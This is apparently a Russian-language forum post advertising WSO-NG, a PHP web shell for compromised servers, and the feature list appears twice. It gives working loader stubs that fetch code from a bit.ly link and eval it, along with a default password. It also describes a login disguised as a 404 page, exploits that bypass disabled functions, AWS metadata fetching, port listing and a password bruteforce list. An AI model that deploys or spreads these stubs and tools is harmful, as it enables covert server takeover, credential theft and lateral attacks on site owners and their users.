Релизнул у себя пару лет назад, и с тех пор не прикасался, то есть могут быть баги. Но функционал получился пушка.
Фичи:
теперь может ставить свой пароль при загрузке через стаб:
и будет использовать его вместо жестко заданного. Стандартный пароль по-умолчанию
- все загрузки подфайлов теперь кэшируются в /tmp и архивируются
- страница входа показывает естественную страницу сайта "404 не найдено". Просто введите пароль и нажмите Enter, потому что поле пароля скрыто за пределами экрана, но уже сфокусировано.
- новая панель навигации breadcrumps. Должно быть гораздо полезнее.
- все файлы\каталоги теперь подсвечиваются в соответствии с их правами редактирования\просмотра
- путь теперь кликабельный. Можно перейти в файл\путь прямо из поля breadcrumps
- добавил эксплойт fastCGI для автоматического повышения и обхода отключенных функций, когда это возможно
- добавил эксплойт php add-filter для обхода отключенных функций и получения консольного выполнения, когда это возможно
- ajax теперь по умолчанию
- Ctrl+Enter в любом поле для сохранения\запуска
- добавлена команда "Fetch AWS metadata" в закладки
- добавлена горячая ссылка на "Linux Exploit Suggester v2" по умолчанию.
- добавлена интеграция VirusTotal для автоматической проверки репутации IP. (если барахлит - впешите свой ключик от VT)
- добавлена интеграция https://securitytrails.com для отображения соседей на том же IP.
- добавлена интеграция ip-info для отображения доменов на том же сервере
- добавлена проверка обратного IP для отображения реального IP, а не локального.
- добавлена информация о памяти, ядрах и средней нагрузке на верхнюю панель.
- клик по IP копирует его в буфер обмена.
- добавлен список открытых портов и сокетов в раздел Sec. Info. Работает даже при отсутствии привилегий консоли, через fsock.
- добавлена поддержка phpRedis в раздел Sec. Info.
- переработан раздел "Userful". Теперь работает через ограничения basedir.
- теперь можно тачить файлы прямо в списке файлов файлового менеджера.
- быстрое копирование имени\пути в буфер обмена одним щелчком.
- подсветка синтаксиса везде.
- редактирование PHP-кода с поддержкой автоотступа.
- список паролей top1000 по умолчанию (https://bit.ly/top1kpass) в разделе "Bruteforce".
Если видите баг - пишите, или еще лучше закомитьте фикс прямо на гитхабе.
Наслаждайтесь.
Фичи:
теперь может ставить свой пароль при загрузке через стаб:
<?php eval(substr(file_get_contents('https://bit.ly/get-wso-ng?pass=ed78a48738eb97ffb5624741bdf391c3'), 5)); ?><?php $sorrymom = create_function('', "substr(implode('', file('https://bit.ly/get-wso-ng?pass=ed78a48738eb97ffb5624741bdf391c3')), 5)");$sorrymom();и будет использовать его вместо жестко заданного. Стандартный пароль по-умолчанию
root- все загрузки подфайлов теперь кэшируются в /tmp и архивируются
- страница входа показывает естественную страницу сайта "404 не найдено". Просто введите пароль и нажмите Enter, потому что поле пароля скрыто за пределами экрана, но уже сфокусировано.
- новая панель навигации breadcrumps. Должно быть гораздо полезнее.
- все файлы\каталоги теперь подсвечиваются в соответствии с их правами редактирования\просмотра
- путь теперь кликабельный. Можно перейти в файл\путь прямо из поля breadcrumps
- добавил эксплойт fastCGI для автоматического повышения и обхода отключенных функций, когда это возможно
- добавил эксплойт php add-filter для обхода отключенных функций и получения консольного выполнения, когда это возможно
- ajax теперь по умолчанию
- Ctrl+Enter в любом поле для сохранения\запуска
- добавлена команда "Fetch AWS metadata" в закладки
- добавлена горячая ссылка на "Linux Exploit Suggester v2" по умолчанию.
- добавлена интеграция VirusTotal для автоматической проверки репутации IP. (если барахлит - впешите свой ключик от VT)
- добавлена интеграция https://securitytrails.com для отображения соседей на том же IP.
- добавлена интеграция ip-info для отображения доменов на том же сервере
- добавлена проверка обратного IP для отображения реального IP, а не локального.
- добавлена информация о памяти, ядрах и средней нагрузке на верхнюю панель.
- клик по IP копирует его в буфер обмена.
- добавлен список открытых портов и сокетов в раздел Sec. Info. Работает даже при отсутствии привилегий консоли, через fsock.
- добавлена поддержка phpRedis в раздел Sec. Info.
- переработан раздел "Userful". Теперь работает через ограничения basedir.
- теперь можно тачить файлы прямо в списке файлов файлового менеджера.
- быстрое копирование имени\пути в буфер обмена одним щелчком.
- подсветка синтаксиса везде.
- редактирование PHP-кода с поддержкой автоотступа.
- список паролей top1000 по умолчанию (https://bit.ly/top1kpass) в разделе "Bruteforce".
Если видите баг - пишите, или еще лучше закомитьте фикс прямо на гитхабе.
GitHub - aels/wso-ng: The new generation of famous WSO web shell. With perks included
The new generation of famous WSO web shell. With perks included - aels/wso-ng
github.com
Наслаждайтесь.